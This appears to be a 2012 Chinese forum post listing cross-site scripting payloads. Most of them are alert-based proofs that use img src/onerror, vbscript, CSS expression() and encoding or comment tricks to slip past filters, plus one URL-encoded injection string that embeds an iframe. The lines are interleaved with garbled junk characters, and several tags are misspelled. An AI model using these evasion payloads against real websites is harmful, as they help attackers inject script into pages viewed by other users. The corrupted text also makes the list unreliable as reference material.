<script>alert("跨站")</script> (最常用)
9 j/ k7 ^* D( c: ~# J8 B<img scr=javascript:alert("跨站")></img>+ y, y& z- Y: O, h( f
<img scr="javascript: alert(/跨站/)></img>
3 t& [# _8 O3 B+ r<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
& [( d, d, J# }' V# i<img scr="#" onerror=alert(/跨站/)></img>+ F8 `. j1 y5 x% j
<img scr="#" style="xss:expression(alert(/xss/));"></img>3 ~9 K+ \" u m9 w6 L- F2 q
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)+ M* g6 _( C# r0 e& j- z" Y( m7 l
<img src=vbscript:msgbox ("xss")></img>
7 T! G+ }5 `& v" L0 [( Y$ z<style> input {left:expression (alert('xss'))}</style>
" t$ P/ ? F+ k, V2 b. }: T<div style={left:expression (alert('xss'))}></div>
4 s3 |+ O1 S1 u* q5 P/ P<div style={left:exp/* */ression (alert('xss'))}></div>
7 O* Z- Z1 t+ n5 R8 d( |<div style={left:\0065\0078ression (alert('xss'))}></div>' k; |' C2 ^& J; l, L
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
2 k- Z1 v6 l0 ounicode <div style="{left:expRessioN (alert('xss'))}">, |6 B7 H& _7 O, i9 j8 q. h
: f; U. X) ]4 C6 Q6 \"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
% v/ E9 I( Z( f# Q; Z# A# }& I0 Z |
发表于 2012-9-13 17:15:04
收藏
支持
反对